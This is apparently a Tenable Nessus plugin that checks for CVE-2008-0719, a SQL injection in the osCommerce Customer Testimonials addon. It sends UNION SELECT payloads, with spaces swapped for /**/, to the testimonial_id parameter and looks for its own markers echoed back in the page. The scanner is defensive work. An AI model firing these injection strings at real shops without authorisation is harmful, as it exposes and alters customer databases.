#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31051);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2008-0719");
  script_bugtraq_id(27664);
  script_xref(name:"milw0rm", value:"5075");
  script_xref(name:"Secunia", value:"28831");

  script_name(english:"osCommerce Customer Testimonials testimonial_id SQL Injection Vulnerability");
  script_summary(english:"Tries to manipulate a testimonial");

  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to a SQL
injection attack. 

Description :

The remote host is running Customer Testimonials, a third-party addon
for the open-source e-commerce system osCommerce. 

The version of Customer Testimonials installed on the remote host
fails to sanitize user input to the 'testimonial_id' parameter of the
'customer_testimonials.php' script before using it to construct a
database query.  Regardless of PHP's 'magic_quotes_gpc' setting, an
unauthenticated attacker may be able to exploit this issue to
manipulate database queries, leading to disclosure of sensitive
information, modification of data, or attacks against the underlying
database. 

Solution :

Unknown at this time. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


magic1 = unixtime();
magic2 = rand();
magic3 = rand();
magic4 = rand();

exploits = make_list(
  string("99999 UNION SELECT ", magic1, ",2,concat(", magic2, ",0x3a,", magic3, ",0x3a,", magic4, "),4,5,6,7/*"),
  string("99999 UNION SELECT ", magic1, ",2,concat(", magic2, ",0x3a,", magic3, ",0x3a,", magic4, "),4,5,6,7,8/*"),
  string("99999 UNION SELECT ", magic1, ",2,concat(", magic2, ",0x3a,", magic3, ",0x3a,", magic4, "),4,5,6,7,8,9/*")
);


# Loop through various directories.
if (thorough_tests) dirs = make_list("/oscommerce", "/catalog", "/store", "/shop", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to manipulate a category listing.
  foreach exploit (exploits)
  {
    req = http_get(
      item:string(
        dir, "/customer_testimonials.php?",
        "testimonial_id=", str_replace(find:" ", replace:"/**/", string:exploit)
      ), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # There's a problem if we could manipulate the testimonial.
    if (
      "<!-- customer testimonials //-->" >< res &&
      string("Subject: ", magic1, "<br><br>", magic2, ":", magic3, ":", magic4, "<p>") >< res
    )
    {
      security_hole(port);
      exit(0);
    }
  }
}
